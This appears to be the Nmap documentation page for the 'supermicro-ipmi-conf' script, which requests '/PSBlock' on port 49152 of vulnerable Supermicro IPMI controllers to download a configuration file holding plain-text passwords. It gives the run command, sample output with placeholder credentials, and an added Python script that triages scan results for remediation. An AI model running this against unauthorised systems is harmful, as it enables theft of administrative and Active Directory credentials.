Script supermicro-ipmi-conf

Script types: portrule
Categories: exploit, vuln
Download: https://svn.nmap.org/nmap/scripts/supermicro-ipmi-conf.nse

Script Summary

Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro Onboard IPMI controllers.

The script connects to port 49152 and issues a request for "/PSBlock" to download the file. The configuration file contains user accounts with their passwords in plain text.

References:

Script Arguments

supermicro-ipmi-conf.out

Output file in which to store the downloaded configuration file. Default: <ip>_bmc.conf

slaxml.debug

See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.short, vulns.showall

See the documentation for the vulns library.

Example Usage

nmap -p49152 --script supermicro-ipmi-conf <target>

Script Output

PORT      STATE SERVICE REASON
49152/tcp open  unknown syn-ack
| supermicro-ipmi-conf:
|   VULNERABLE:
|   Supermicro IPMI/BMC configuration file disclosure
|     State: VULNERABLE (Exploitable)
|     Description:
|       Some Supermicro IPMI/BMC controllers allow attackers to download
|        a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the
|       network's Active Directory.
|     Disclosure date: 2014-06-19
|     Extra information:
|       Snippet from configuration file:
|   .............31spring.............\x14..............\x01\x01\x01.\x01......\x01ADMIN...........ThIsIsApAsSwOrD.............T.T............\x01\x01\x01.\x01......\x01ipmi............w00t!.............\x14.............
|   Configuration file saved to 'xxx.xxx.xxx.xxx_bmc.conf'
|
|     References:
|_      http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
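
For remediation tracking, the following added example (not part of the Nmap script or its documentation) reads Nmap XML output (`-oX`) from a run of this script and classifies each host with tcp/49152 open, reporting the saved dump file so it can be restricted or deleted, since it holds plain-text passwords. The sample XML, the `triage` function and the status labels are constructed for illustration, and matching on the script's text output assumes the wording shown in the Script Output above.

```python
import re
import xml.etree.ElementTree as ET

SCRIPT_ID = "supermicro-ipmi-conf"

# Constructed sample of `nmap -oX` output (documentation-range addresses).
SAMPLE_XML = """<nmaprun>
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="49152"><state state="open"/>
      <script id="supermicro-ipmi-conf" output="&#xa;  VULNERABLE:&#xa;  Supermicro IPMI/BMC configuration file disclosure&#xa;    State: VULNERABLE (Exploitable)&#xa;  Configuration file saved to '192.0.2.10_bmc.conf'&#xa;"/>
    </port></ports>
  </host>
  <host>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="49152"><state state="open"/></port></ports>
  </host>
  <host>
    <address addr="192.0.2.12" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="49152"><state state="closed"/></port></ports>
  </host>
</nmaprun>"""

def triage(xml_text):
    """Classify each host with tcp/49152 open by what the script reported."""
    results = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "unknown"
        for port in host.iter("port"):
            state = port.find("state")
            if port.get("portid") != "49152" or state is None or state.get("state") != "open":
                continue
            script = port.find(f"script[@id='{SCRIPT_ID}']")
            out = script.get("output", "") if script is not None else ""
            # The saved dump contains plain-text passwords: record where it was written.
            saved = re.search(r"Configuration file saved to '([^']+)'", out)
            results.append({
                "host": addr,
                "status": "vulnerable" if "State: VULNERABLE" in out else "open-not-flagged",
                "dump_file": saved.group(1) if saved else None,
            })
    return results

if __name__ == "__main__":
    for row in triage(SAMPLE_XML):
        print(row)
```

Hosts reported as `open-not-flagged` still expose the port to the scanner's network position and are worth checking against management-network access rules.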

Requires


Author:

  • Paulino Calderon <calderon () websec mx>

License: Same as Nmap--See https://nmap.org/book/man-legal.html